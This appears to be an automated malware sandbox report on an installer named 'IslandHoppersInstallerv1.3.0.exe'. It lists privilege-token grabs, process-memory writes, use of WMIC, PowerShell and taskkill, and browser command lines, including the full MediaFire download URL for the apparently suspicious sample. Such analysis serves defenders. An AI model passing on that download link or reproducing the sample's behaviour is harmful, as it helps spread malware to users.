N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1376 wrote to memory of 2728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 2728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 3500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1376 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/zkifq4bnbg77ur2/IslandHoppersInstallerv1.3.0.exe/file

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd75263cb8,0x7ffd75263cc8,0x7ffd75263cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

